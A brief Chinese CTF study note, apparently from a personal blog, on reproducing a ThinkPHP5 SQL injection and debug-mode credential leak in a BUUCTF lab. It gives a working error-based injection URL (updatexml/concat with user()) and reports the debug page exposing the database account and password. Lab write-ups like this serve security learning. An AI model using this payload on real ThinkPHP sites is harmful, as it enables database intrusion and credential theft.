「配枪朱丽叶。」

RootのCTF学习笔记。

ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

BUUCTF 漏洞复现

漏洞原理:
xz.aliyun.com
记笔记:

【1】该漏洞形成最关键的一点是需要开启debug模式。
【2】数据库账户和密码泄漏的前提是SQL语句执行失败或者发生异常的时候才会出现。如果非SQL语法错误的debug模式下是不会泄漏数据库账户和密码的。

漏洞利用:

http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

信息成功被爆出:
https://s2.ax1x.com/2020/02/08/12sTYt.png
DEBUG页面,我们找到了数据库的账号、密码:
https://s2.ax1x.com/2020/02/08/12sOOg.png